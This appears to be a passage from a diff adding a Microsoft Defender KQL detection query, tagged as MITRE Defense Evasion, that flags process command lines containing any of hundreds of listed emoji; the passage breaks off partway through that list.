+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "😀" or ProcessCommandLine contains "😃" or ProcessCommandLine contains "😄" or ProcessCommandLine contains "😁" or ProcessCommandLine contains "😆" or ProcessCommandLine contains "😅" or ProcessCommandLine contains "😂" or ProcessCommandLine contains "🤣" or ProcessCommandLine contains "🥲" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "☺️" or ProcessCommandLine contains "😊" or ProcessCommandLine contains "😇" or ProcessCommandLine contains "🙂" or ProcessCommandLine contains "🙃" or ProcessCommandLine contains "😉" or ProcessCommandLine contains "😌" or ProcessCommandLine contains "😍" or ProcessCommandLine contains "🥰" or ProcessCommandLine contains "😘" or ProcessCommandLine contains "😗" or ProcessCommandLine contains "😙" or ProcessCommandLine contains "😚" or ProcessCommandLine contains "😋" or ProcessCommandLine contains "😛" or ProcessCommandLine contains "😝" or ProcessCommandLine contains "😜" or ProcessCommandLine contains "🤪" or ProcessCommandLine contains "🤨" or ProcessCommandLine contains "🧐" or ProcessCommandLine contains "🤓" or ProcessCommandLine contains "😎" or ProcessCommandLine contains "🥸" or ProcessCommandLine contains "🤩" or ProcessCommandLine contains "🥳" or 
ProcessCommandLine contains "😏" or ProcessCommandLine contains "😒" or ProcessCommandLine contains "😞" or ProcessCommandLine contains "😔" or ProcessCommandLine contains "😟" or ProcessCommandLine contains "😕" or ProcessCommandLine contains "🙁" or ProcessCommandLine contains "☹️" or ProcessCommandLine contains "😣" or ProcessCommandLine contains "😖" or ProcessCommandLine contains "😫" or ProcessCommandLine contains "😩" or ProcessCommandLine contains "🥺" or ProcessCommandLine contains "😢" or ProcessCommandLine contains "😭" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😤" or ProcessCommandLine contains "😠" or ProcessCommandLine contains "😡" or ProcessCommandLine contains "🤬" or ProcessCommandLine contains "🤯" or ProcessCommandLine contains "😳" or ProcessCommandLine contains "🥵" or ProcessCommandLine contains "🥶" or ProcessCommandLine contains "😱" or ProcessCommandLine contains "😨" or ProcessCommandLine contains "😰" or ProcessCommandLine contains "😥" or ProcessCommandLine contains "😓" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🤗" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🤔" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🤭" or ProcessCommandLine contains "🤫" or ProcessCommandLine contains "🤥" or ProcessCommandLine contains "😶" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "😐" or ProcessCommandLine contains "😑" or ProcessCommandLine contains "😬" or ProcessCommandLine contains "🫠" or ProcessCommandLine contains "🙄" or ProcessCommandLine contains "😯" or ProcessCommandLine contains "😦" or ProcessCommandLine contains "😧" or ProcessCommandLine contains "😮" or ProcessCommandLine contains "😲" or ProcessCommandLine contains "🥱" or ProcessCommandLine contains "😴" or ProcessCommandLine contains "🤤" or ProcessCommandLine contains "😪" or ProcessCommandLine contains "😵" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🤐" 
or ProcessCommandLine contains "🥴" or ProcessCommandLine contains "🤢" or ProcessCommandLine contains "🤮" or ProcessCommandLine contains "🤧" or ProcessCommandLine contains "😷" or ProcessCommandLine contains "🤒" or ProcessCommandLine contains "🤕" or ProcessCommandLine contains "🤑" or ProcessCommandLine contains "🤠" or ProcessCommandLine contains "😈" or ProcessCommandLine contains "👿" or ProcessCommandLine contains "👹" or ProcessCommandLine contains "👺" or ProcessCommandLine contains "🤡" or ProcessCommandLine contains "💩" or ProcessCommandLine contains "👻" or ProcessCommandLine contains "💀" or ProcessCommandLine contains "☠️" or ProcessCommandLine contains "👽" or ProcessCommandLine contains "👾" or ProcessCommandLine contains "🤖" or ProcessCommandLine contains "🎃" or ProcessCommandLine contains "😺" or ProcessCommandLine contains "😸" or ProcessCommandLine contains "😹" or ProcessCommandLine contains "😻" or ProcessCommandLine contains "😼" or ProcessCommandLine contains "😽" or ProcessCommandLine contains "🙀" or ProcessCommandLine contains "😿" or ProcessCommandLine contains "😾" or ProcessCommandLine contains "👋" or ProcessCommandLine contains "🤚" or ProcessCommandLine contains "🖐" or ProcessCommandLine contains "✋" or ProcessCommandLine contains "🖖" or ProcessCommandLine contains "👌" or ProcessCommandLine contains "🤌" or ProcessCommandLine contains "🤏" or ProcessCommandLine contains "✌️" or ProcessCommandLine contains "🤞" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🤟" or ProcessCommandLine contains "🤘" or ProcessCommandLine contains "🤙" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "👈" or ProcessCommandLine contains "👉" or ProcessCommandLine contains "👆" or ProcessCommandLine contains "🖕" or ProcessCommandLine contains "👇" or ProcessCommandLine contains "☝️" or ProcessCommandLine contains "👍" 
or ProcessCommandLine contains "👎" or ProcessCommandLine contains "✊" or ProcessCommandLine contains "👊" or ProcessCommandLine contains "🤛" or ProcessCommandLine contains "🤜" or ProcessCommandLine contains "👏" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🙌" or ProcessCommandLine contains "👐" or ProcessCommandLine contains "🤲" or ProcessCommandLine contains "🤝" or ProcessCommandLine contains "🙏" or ProcessCommandLine contains "✍️" or ProcessCommandLine contains "💪" or ProcessCommandLine contains "🦾" or ProcessCommandLine contains "🦵" or ProcessCommandLine contains "🦿" or ProcessCommandLine contains "🦶" or ProcessCommandLine contains "👣" or ProcessCommandLine contains "👂" or ProcessCommandLine contains "🦻" or ProcessCommandLine contains "👃" or ProcessCommandLine contains "🫀" or ProcessCommandLine contains "🫁" or ProcessCommandLine contains "🧠" or ProcessCommandLine contains "🦷" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "👀" or ProcessCommandLine contains "👁" or ProcessCommandLine contains "👅" or ProcessCommandLine contains "👄" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "💋" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "👶" or ProcessCommandLine contains "👧" or ProcessCommandLine contains "🧒" or ProcessCommandLine contains "👦" or ProcessCommandLine contains "👩" or ProcessCommandLine contains "🧑" or ProcessCommandLine contains "👨" or ProcessCommandLine contains "👩‍🦱" or ProcessCommandLine contains "🧑‍🦱" or ProcessCommandLine contains "👨‍🦱" or ProcessCommandLine contains "👩‍🦰" or ProcessCommandLine contains "🧑‍🦰" or ProcessCommandLine contains "👨‍🦰" or ProcessCommandLine contains "👱‍♀️" or ProcessCommandLine contains "👱" or ProcessCommandLine contains "👱‍♂️" or ProcessCommandLine contains "👩‍🦳" or ProcessCommandLine contains "🧑‍🦳" or ProcessCommandLine contains "👨‍🦳" or ProcessCommandLine contains "👩‍🦲" or ProcessCommandLine contains "🧑‍🦲" or ProcessCommandLine contains "👨‍🦲" or 
ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "👵" or ProcessCommandLine contains "🧓" or ProcessCommandLine contains "👴" or ProcessCommandLine contains "👲" or ProcessCommandLine contains "👳‍♀️" or ProcessCommandLine contains "👳" or ProcessCommandLine contains "👳‍♂️" or ProcessCommandLine contains "🧕" or ProcessCommandLine contains "👮‍♀️" or ProcessCommandLine contains "👮" or ProcessCommandLine contains "👮‍♂️" or ProcessCommandLine contains "👷‍♀️" or ProcessCommandLine contains "👷" or ProcessCommandLine contains "👷‍♂️" or ProcessCommandLine contains "💂‍♀️" or ProcessCommandLine contains "💂" or ProcessCommandLine contains "💂‍♂️" or ProcessCommandLine contains "🕵️‍♀️" or ProcessCommandLine contains "🕵️" or ProcessCommandLine contains "🕵️‍♂️" or ProcessCommandLine contains "👩‍⚕️" or ProcessCommandLine contains "🧑‍⚕️" or ProcessCommandLine contains "👨‍⚕️" or ProcessCommandLine contains "👩‍🌾" or ProcessCommandLine contains "🧑‍🌾" or ProcessCommandLine contains "👨‍🌾" or ProcessCommandLine contains "👩‍🍳" or ProcessCommandLine contains "🧑‍🍳" or ProcessCommandLine contains "👨‍🍳" or ProcessCommandLine contains "👩‍🎓" or ProcessCommandLine contains "🧑‍🎓" or ProcessCommandLine contains "👨‍🎓" or ProcessCommandLine contains "👩‍🎤" or ProcessCommandLine contains "🧑‍🎤" or ProcessCommandLine contains "👨‍🎤" or ProcessCommandLine contains "👩‍🏫" or ProcessCommandLine contains "🧑‍🏫" or ProcessCommandLine contains "👨‍🏫" or ProcessCommandLine contains "👩‍🏭" or ProcessCommandLine contains "🧑‍🏭" or ProcessCommandLine contains "👨‍🏭" or ProcessCommandLine contains "👩‍💻" or ProcessCommandLine contains "🧑‍💻" or ProcessCommandLine contains "👨‍💻" or ProcessCommandLine contains "👩‍💼" or ProcessCommandLine contains "🧑‍💼" or ProcessCommandLine contains "👨‍💼" or ProcessCommandLine contains "👩‍🔧" or ProcessCommandLine contains "🧑‍🔧" or ProcessCommandLine contains "👨‍🔧" or ProcessCommandLine contains "👩‍🔬" or 
ProcessCommandLine contains "🧑‍🔬" or ProcessCommandLine contains "👨‍🔬" or ProcessCommandLine contains "👩‍🎨" or ProcessCommandLine contains "🧑‍🎨" or ProcessCommandLine contains "👨‍🎨" or ProcessCommandLine contains "👩‍🚒" or ProcessCommandLine contains "🧑‍🚒" or ProcessCommandLine contains "👨‍🚒" or ProcessCommandLine contains "👩‍✈️" or ProcessCommandLine contains "🧑‍✈️" or ProcessCommandLine contains "👨‍✈️" or ProcessCommandLine contains "👩‍🚀" or ProcessCommandLine contains "🧑‍🚀" or ProcessCommandLine contains "👨‍🚀" or ProcessCommandLine contains "👩‍⚖️" or ProcessCommandLine contains "🧑‍⚖️" or ProcessCommandLine contains "👨‍⚖️" or ProcessCommandLine contains "👰‍♀️" or ProcessCommandLine contains "👰" or ProcessCommandLine contains "👰‍♂️" or ProcessCommandLine contains "🤵‍♀️" or ProcessCommandLine contains "🤵" or ProcessCommandLine contains "🤵‍♂️" or ProcessCommandLine contains "👸" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🤴" or ProcessCommandLine contains "🥷" or ProcessCommandLine contains "🦸‍♀️" or ProcessCommandLine contains "🦸" or ProcessCommandLine contains "🦸‍♂️" or ProcessCommandLine contains "🦹‍♀️" or ProcessCommandLine contains "🦹" or ProcessCommandLine contains "🦹‍♂️" or ProcessCommandLine contains "🤶" or ProcessCommandLine contains "🧑‍🎄" or ProcessCommandLine contains "🎅" or ProcessCommandLine contains "🧙‍♀️" or ProcessCommandLine contains "🧙" or ProcessCommandLine contains "🧙‍♂️" or ProcessCommandLine contains "🧝‍♀️" or ProcessCommandLine contains "🧝" or ProcessCommandLine contains "🧝‍♂️" or ProcessCommandLine contains "🧛‍♀️" or ProcessCommandLine contains "🧛" or ProcessCommandLine contains "🧛‍♂️" or ProcessCommandLine contains "🧟‍♀️" or ProcessCommandLine contains "🧟" or ProcessCommandLine contains "🧟‍♂️" or ProcessCommandLine contains "🧞‍♀️" or ProcessCommandLine contains "🧞" or ProcessCommandLine contains "🧞‍♂️" or ProcessCommandLine contains "🧜‍♀️" or ProcessCommandLine contains "🧜" or ProcessCommandLine contains "🧜‍♂️" or 
ProcessCommandLine contains "🧚‍♀️" or ProcessCommandLine contains "🧚" or ProcessCommandLine contains "🧚‍♂️" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "👼" or ProcessCommandLine contains "🤰" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🤱" or ProcessCommandLine contains "👩‍🍼" or ProcessCommandLine contains "🧑‍🍼" or ProcessCommandLine contains "👨‍🍼" or ProcessCommandLine contains "🙇‍♀️" or ProcessCommandLine contains "🙇" or ProcessCommandLine contains "🙇‍♂️" or ProcessCommandLine contains "💁‍♀️" or ProcessCommandLine contains "💁" or ProcessCommandLine contains "💁‍♂️" or ProcessCommandLine contains "🙅‍♀️" or ProcessCommandLine contains "🙅" or ProcessCommandLine contains "🙅‍♂️" or ProcessCommandLine contains "🙆‍♀️" or ProcessCommandLine contains "🙆" or ProcessCommandLine contains "🙆‍♂️" or ProcessCommandLine contains "🙋‍♀️" or ProcessCommandLine contains "🙋" or ProcessCommandLine contains "🙋‍♂️" or ProcessCommandLine contains "🧏‍♀️" or ProcessCommandLine contains "🧏" or ProcessCommandLine contains "🧏‍♂️" or ProcessCommandLine contains "🤦‍♀️" or ProcessCommandLine contains "🤦" or ProcessCommandLine contains "🤦‍♂️" or ProcessCommandLine contains "🤷‍♀️" or ProcessCommandLine contains "🤷" or ProcessCommandLine contains "🤷‍♂️" or ProcessCommandLine contains "🙎‍♀️" or ProcessCommandLine contains "🙎" or ProcessCommandLine contains "🙎‍♂️" or ProcessCommandLine contains "🙍‍♀️" or ProcessCommandLine contains "🙍" or ProcessCommandLine contains "🙍‍♂️" or ProcessCommandLine contains "💇‍♀️" or ProcessCommandLine contains "💇" or ProcessCommandLine contains "💇‍♂️" or ProcessCommandLine contains "💆‍♀️" or ProcessCommandLine contains "💆" or ProcessCommandLine contains "💆‍♂️" or ProcessCommandLine contains "🧖‍♀️" or ProcessCommandLine contains "🧖" or ProcessCommandLine contains "🧖‍♂️" or ProcessCommandLine contains "💅" or ProcessCommandLine contains "💃" or ProcessCommandLine contains "🕺" or ProcessCommandLine 
contains "👯‍♀️" or ProcessCommandLine contains "👯" or ProcessCommandLine contains "👯‍♂️" or ProcessCommandLine contains "🕴" or ProcessCommandLine contains "👩‍🦽" or ProcessCommandLine contains "🧑‍🦽" or ProcessCommandLine contains "👨‍🦽" or ProcessCommandLine contains "👩‍🦼" or ProcessCommandLine contains "🧑‍🦼" or ProcessCommandLine contains "👨‍🦼" or ProcessCommandLine contains "🚶‍♀️" or ProcessCommandLine contains "🚶" or ProcessCommandLine contains "🚶‍♂️" or ProcessCommandLine contains "👩‍🦯" or ProcessCommandLine contains "🧑‍🦯" or ProcessCommandLine contains "👨‍🦯" or ProcessCommandLine contains "🧎‍♀️" or ProcessCommandLine contains "🧎" or ProcessCommandLine contains "🧎‍♂️" or ProcessCommandLine contains "🏃‍♀️" or ProcessCommandLine contains "🏃" or ProcessCommandLine contains "🏃‍♂️" or ProcessCommandLine contains "🧍‍♀️" or ProcessCommandLine contains "🧍" or ProcessCommandLine contains "🧍‍♂️" or ProcessCommandLine contains "👭" or ProcessCommandLine contains "🧑‍🤝‍🧑" or ProcessCommandLine contains "👬" or ProcessCommandLine contains "👫" or ProcessCommandLine contains "👩‍❤️‍👩" or ProcessCommandLine contains "💑" or ProcessCommandLine contains "👨‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👩" or ProcessCommandLine contains "💏" or ProcessCommandLine contains "👨‍❤️‍💋‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👨" or ProcessCommandLine contains "👪" or ProcessCommandLine contains "👨‍👩‍👦" or ProcessCommandLine contains "👨‍👩‍👧" or ProcessCommandLine contains "👨‍👩‍👧‍👦" or ProcessCommandLine contains "👨‍👩‍👦‍👦" or ProcessCommandLine contains "👨‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👨‍👦" or ProcessCommandLine contains "👨‍👨‍👧" or ProcessCommandLine contains "👨‍👨‍👧‍👦" or ProcessCommandLine contains "👨‍👨‍👦‍👦" or ProcessCommandLine contains "👨‍👨‍👧‍👧" or ProcessCommandLine contains "👩‍👩‍👦" or ProcessCommandLine contains "👩‍👩‍👧" or ProcessCommandLine contains "👩‍👩‍👧‍👦" or ProcessCommandLine contains "👩‍👩‍👦‍👦" or ProcessCommandLine contains "👩‍👩‍👧‍👧" 
or ProcessCommandLine contains "👨‍👦" or ProcessCommandLine contains "👨‍👦‍👦" or ProcessCommandLine contains "👨‍👧" or ProcessCommandLine contains "👨‍👧‍👦" or ProcessCommandLine contains "👨‍👧‍👧" or ProcessCommandLine contains "👩‍👦" or ProcessCommandLine contains "👩‍👦‍👦" or ProcessCommandLine contains "👩‍👧" or ProcessCommandLine contains "👩‍👧‍👦" or ProcessCommandLine contains "👩‍👧‍👧" or ProcessCommandLine contains "🗣" or ProcessCommandLine contains "👤" or ProcessCommandLine contains "👥" or ProcessCommandLine contains "🫂" or ProcessCommandLine contains "🧳" or ProcessCommandLine contains "🌂" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🧵" or ProcessCommandLine contains "🪡" or ProcessCommandLine contains "🪢" or ProcessCommandLine contains "🧶" or ProcessCommandLine contains "👓" or ProcessCommandLine contains "🕶" or ProcessCommandLine contains "🥽" or ProcessCommandLine contains "🥼" or ProcessCommandLine contains "🦺" or ProcessCommandLine contains "👔" or ProcessCommandLine contains "👕" or ProcessCommandLine contains "👖" or ProcessCommandLine contains "🧣" or ProcessCommandLine contains "🧤" or ProcessCommandLine contains "🧥" or ProcessCommandLine contains "🧦" or ProcessCommandLine contains "👗" or ProcessCommandLine contains "👘" or ProcessCommandLine contains "🥻" or ProcessCommandLine contains "🩴" or ProcessCommandLine contains "🩱" or ProcessCommandLine contains "🩲" or ProcessCommandLine contains "🩳" or ProcessCommandLine contains "👙" or ProcessCommandLine contains "👚" or ProcessCommandLine contains "👛" or ProcessCommandLine contains "👜" or ProcessCommandLine contains "👝" or ProcessCommandLine contains "🎒" or ProcessCommandLine contains "👞" or ProcessCommandLine contains "👟" or ProcessCommandLine contains "🥾" or ProcessCommandLine contains "🥿" or ProcessCommandLine contains "👠" or ProcessCommandLine contains "👡" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "👢" or ProcessCommandLine contains "👑" or ProcessCommandLine contains "👒" or 
ProcessCommandLine contains "🎩" or ProcessCommandLine contains "🎓" or ProcessCommandLine contains "🧢" or ProcessCommandLine contains "⛑" or ProcessCommandLine contains "🪖" or ProcessCommandLine contains "💄" or ProcessCommandLine contains "💍" or ProcessCommandLine contains "💼" or ProcessCommandLine contains "👋🏻" or ProcessCommandLine contains "🤚🏻" or ProcessCommandLine contains "🖐🏻" or ProcessCommandLine contains "✋🏻" or ProcessCommandLine contains "🖖🏻" or ProcessCommandLine contains "👌🏻" or ProcessCommandLine contains "🤌🏻" or ProcessCommandLine contains "🤏🏻" or ProcessCommandLine contains "✌🏻" or ProcessCommandLine contains "🤞🏻" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🤟🏻" or ProcessCommandLine contains "🤘🏻" or ProcessCommandLine contains "🤙🏻" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "👈🏻" or ProcessCommandLine contains "👉🏻" or ProcessCommandLine contains "👆🏻" or ProcessCommandLine contains "🖕🏻" or ProcessCommandLine contains "👇🏻" or ProcessCommandLine contains "☝🏻" or ProcessCommandLine contains "👍🏻" or ProcessCommandLine contains "👎🏻" or ProcessCommandLine contains "✊🏻" or ProcessCommandLine contains "👊🏻" or ProcessCommandLine contains "🤛🏻" or ProcessCommandLine contains "🤜🏻" or ProcessCommandLine contains "👏🏻" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🙌🏻" or ProcessCommandLine contains "👐🏻" or ProcessCommandLine contains "🤲🏻" or ProcessCommandLine contains "🙏🏻" or ProcessCommandLine contains "✍🏻" or ProcessCommandLine contains "💪🏻" or ProcessCommandLine contains "🦵🏻" or ProcessCommandLine contains "🦶🏻" or ProcessCommandLine contains "👂🏻" or ProcessCommandLine contains "🦻🏻" or ProcessCommandLine contains "👃🏻" or ProcessCommandLine contains "👶🏻" or ProcessCommandLine contains "👧🏻" or ProcessCommandLine contains "🧒🏻" or ProcessCommandLine contains 
"👦🏻" or ProcessCommandLine contains "👩🏻" or ProcessCommandLine contains "🧑🏻" or ProcessCommandLine contains "👨🏻" or ProcessCommandLine contains "👩🏻‍🦱" or ProcessCommandLine contains "🧑🏻‍🦱" or ProcessCommandLine contains "👨🏻‍🦱" or ProcessCommandLine contains "👩🏻‍🦰" or ProcessCommandLine contains "🧑🏻‍🦰" or ProcessCommandLine contains "👨🏻‍🦰" or ProcessCommandLine contains "👱🏻‍♀️" or ProcessCommandLine contains "👱🏻" or ProcessCommandLine contains "👱🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦳" or ProcessCommandLine contains "🧑🏻‍🦳" or ProcessCommandLine contains "👨🏻‍🦳" or ProcessCommandLine contains "👩🏻‍🦲" or ProcessCommandLine contains "🧑🏻‍🦲" or ProcessCommandLine contains "👨🏻‍🦲" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏻" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "👵🏻" or ProcessCommandLine contains "🧓🏻" or ProcessCommandLine contains "👴🏻" or ProcessCommandLine contains "👲🏻" or ProcessCommandLine contains "👳🏻‍♀️" or ProcessCommandLine contains "👳🏻" or ProcessCommandLine contains "👳🏻‍♂️" or ProcessCommandLine contains "🧕🏻" or ProcessCommandLine contains "👮🏻‍♀️" or ProcessCommandLine contains "👮🏻" or ProcessCommandLine contains "👮🏻‍♂️" or ProcessCommandLine contains "👷🏻‍♀️" or ProcessCommandLine contains "👷🏻" or ProcessCommandLine contains "👷🏻‍♂️" or ProcessCommandLine contains "💂🏻‍♀️" or ProcessCommandLine contains "💂🏻" or ProcessCommandLine contains "💂🏻‍♂️" or ProcessCommandLine contains "🕵🏻‍♀️" or ProcessCommandLine contains "🕵🏻" or ProcessCommandLine contains "🕵🏻‍♂️" or ProcessCommandLine contains "👩🏻‍⚕️" or ProcessCommandLine contains "🧑🏻‍⚕️" or ProcessCommandLine contains "👨🏻‍⚕️" or ProcessCommandLine contains "👩🏻‍🌾" or ProcessCommandLine contains "🧑🏻‍🌾" or ProcessCommandLine contains "👨🏻‍🌾" or ProcessCommandLine contains "👩🏻‍🍳" or ProcessCommandLine contains "🧑🏻‍🍳" or ProcessCommandLine contains "👨🏻‍🍳" or ProcessCommandLine contains "👩🏻‍🎓" or ProcessCommandLine contains "🧑🏻‍🎓" or ProcessCommandLine contains 
"👨🏻‍🎓" or ProcessCommandLine contains "👩🏻‍🎤" or ProcessCommandLine contains "🧑🏻‍🎤" or ProcessCommandLine contains "👨🏻‍🎤" or ProcessCommandLine contains "👩🏻‍🏫" or ProcessCommandLine contains "🧑🏻‍🏫" or ProcessCommandLine contains "👨🏻‍🏫" or ProcessCommandLine contains "👩🏻‍🏭" or ProcessCommandLine contains "🧑🏻‍🏭" or ProcessCommandLine contains "👨🏻‍🏭" or ProcessCommandLine contains "👩🏻‍💻" or ProcessCommandLine contains "🧑🏻‍💻" or ProcessCommandLine contains "👨🏻‍💻" or ProcessCommandLine contains "👩🏻‍💼" or ProcessCommandLine contains "🧑🏻‍💼" or ProcessCommandLine contains "👨🏻‍💼" or ProcessCommandLine contains "👩🏻‍🔧" or ProcessCommandLine contains "🧑🏻‍🔧" or ProcessCommandLine contains "👨🏻‍🔧" or ProcessCommandLine contains "👩🏻‍🔬" or ProcessCommandLine contains "🧑🏻‍🔬" or ProcessCommandLine contains "👨🏻‍🔬" or ProcessCommandLine contains "👩🏻‍🎨" or ProcessCommandLine contains "🧑🏻‍🎨" or ProcessCommandLine contains "👨🏻‍🎨" or ProcessCommandLine contains "👩🏻‍🚒" or ProcessCommandLine contains "🧑🏻‍🚒" or ProcessCommandLine contains "👨🏻‍🚒" or ProcessCommandLine contains "👩🏻‍✈️" or ProcessCommandLine contains "🧑🏻‍✈️" or ProcessCommandLine contains "👨🏻‍✈️" or ProcessCommandLine contains "👩🏻‍🚀" or ProcessCommandLine contains "🧑🏻‍🚀" or ProcessCommandLine contains "👨🏻‍🚀" or ProcessCommandLine contains "👩🏻‍⚖️" or ProcessCommandLine contains "🧑🏻‍⚖️" or ProcessCommandLine contains "👨🏻‍⚖️" or ProcessCommandLine contains "👰🏻‍♀️" or ProcessCommandLine contains "👰🏻" or ProcessCommandLine contains "👰🏻‍♂️" or ProcessCommandLine contains "🤵🏻‍♀️" or ProcessCommandLine contains "🤵🏻" or ProcessCommandLine contains "🤵🏻‍♂️" or ProcessCommandLine contains "👸🏻" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🤴🏻" or ProcessCommandLine contains "🥷🏻" or ProcessCommandLine contains "🦸🏻‍♀️" or ProcessCommandLine contains "🦸🏻" or ProcessCommandLine contains "🦸🏻‍♂️" or ProcessCommandLine contains "🦹🏻‍♀️" or ProcessCommandLine contains "🦹🏻" or ProcessCommandLine contains "🦹🏻‍♂️" or 
ProcessCommandLine contains "🤶🏻" or ProcessCommandLine contains "🧑🏻‍🎄" or ProcessCommandLine contains "🎅🏻" or ProcessCommandLine contains "🧙🏻‍♀️" or ProcessCommandLine contains "🧙🏻" or ProcessCommandLine contains "🧙🏻‍♂️" or ProcessCommandLine contains "🧝🏻‍♀️" or ProcessCommandLine contains "🧝🏻" or ProcessCommandLine contains "🧝🏻‍♂️" or ProcessCommandLine contains "🧛🏻‍♀️" or ProcessCommandLine contains "🧛🏻" or ProcessCommandLine contains "🧛🏻‍♂️" or ProcessCommandLine contains "🧜🏻‍♀️" or ProcessCommandLine contains "🧜🏻" or ProcessCommandLine contains "🧜🏻‍♂️" or ProcessCommandLine contains "🧚🏻‍♀️" or ProcessCommandLine contains "🧚🏻" or ProcessCommandLine contains "🧚🏻‍♂️" or ProcessCommandLine contains "👼🏻" or ProcessCommandLine contains "🤰🏻" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🤱🏻" or ProcessCommandLine contains "👩🏻‍🍼" or ProcessCommandLine contains "🧑🏻‍🍼" or ProcessCommandLine contains "👨🏻‍🍼" or ProcessCommandLine contains "🙇🏻‍♀️" or ProcessCommandLine contains "🙇🏻" or ProcessCommandLine contains "🙇🏻‍♂️" or ProcessCommandLine contains "💁🏻‍♀️" or ProcessCommandLine contains "💁🏻" or ProcessCommandLine contains "💁🏻‍♂️" or ProcessCommandLine contains "🙅🏻‍♀️" or ProcessCommandLine contains "🙅🏻" or ProcessCommandLine contains "🙅🏻‍♂️" or ProcessCommandLine contains "🙆🏻‍♀️" or ProcessCommandLine contains "🙆🏻" or ProcessCommandLine contains "🙆🏻‍♂️" or ProcessCommandLine contains "🙋🏻‍♀️" or ProcessCommandLine contains "🙋🏻" or ProcessCommandLine contains "🙋🏻‍♂️" or ProcessCommandLine contains "🧏🏻‍♀️" or ProcessCommandLine contains "🧏🏻" or ProcessCommandLine contains "🧏🏻‍♂️" or ProcessCommandLine contains "🤦🏻‍♀️" or ProcessCommandLine contains "🤦🏻" or ProcessCommandLine contains "🤦🏻‍♂️" or ProcessCommandLine contains "🤷🏻‍♀️" or ProcessCommandLine contains "🤷🏻" or ProcessCommandLine contains "🤷🏻‍♂️" or ProcessCommandLine contains "🙎🏻‍♀️" or ProcessCommandLine contains "🙎🏻" or ProcessCommandLine contains "🙎🏻‍♂️" or 
ProcessCommandLine contains "🙍🏻‍♀️" or ProcessCommandLine contains "🙍🏻" or ProcessCommandLine contains "🙍🏻‍♂️" or ProcessCommandLine contains "💇🏻‍♀️" or ProcessCommandLine contains "💇🏻" or ProcessCommandLine contains "💇🏻‍♂️" or ProcessCommandLine contains "💆🏻‍♀️" or ProcessCommandLine contains "💆🏻" or ProcessCommandLine contains "💆🏻‍♂️" or ProcessCommandLine contains "🧖🏻‍♀️" or ProcessCommandLine contains "🧖🏻" or ProcessCommandLine contains "🧖🏻‍♂️" or ProcessCommandLine contains "💃🏻" or ProcessCommandLine contains "🕺🏻" or ProcessCommandLine contains "🕴🏻" or ProcessCommandLine contains "👩🏻‍🦽" or ProcessCommandLine contains "🧑🏻‍🦽" or ProcessCommandLine contains "👨🏻‍🦽" or ProcessCommandLine contains "👩🏻‍🦼" or ProcessCommandLine contains "🧑🏻‍🦼" or ProcessCommandLine contains "👨🏻‍🦼" or ProcessCommandLine contains "🚶🏻‍♀️" or ProcessCommandLine contains "🚶🏻" or ProcessCommandLine contains "🚶🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦯" or ProcessCommandLine contains "🧑🏻‍🦯" or ProcessCommandLine contains "👨🏻‍🦯" or ProcessCommandLine contains "🧎🏻‍♀️" or ProcessCommandLine contains "🧎🏻" or ProcessCommandLine contains "🧎🏻‍♂️" or ProcessCommandLine contains "🏃🏻‍♀️" or ProcessCommandLine contains "🏃🏻" or ProcessCommandLine contains "🏃🏻‍♂️" or ProcessCommandLine contains "🧍🏻‍♀️" or ProcessCommandLine contains "🧍🏻" or ProcessCommandLine contains "🧍🏻‍♂️" or ProcessCommandLine contains "👭🏻" or ProcessCommandLine contains "🧑🏻‍🤝‍🧑🏻" or ProcessCommandLine contains "👬🏻" or ProcessCommandLine contains "👫🏻" or ProcessCommandLine contains "🧗🏻‍♀️" or ProcessCommandLine contains "🧗🏻" or ProcessCommandLine contains "🧗🏻‍♂️" or ProcessCommandLine contains "🏇🏻" or ProcessCommandLine contains "🏂🏻" or ProcessCommandLine contains "🏌🏻‍♀️" or ProcessCommandLine contains "🏌🏻" or ProcessCommandLine contains "🏌🏻‍♂️" or ProcessCommandLine contains "🏄🏻‍♀️" or ProcessCommandLine contains "🏄🏻" or ProcessCommandLine contains "🏄🏻‍♂️" or ProcessCommandLine contains "🚣🏻‍♀️" or ProcessCommandLine contains "🚣🏻" or 
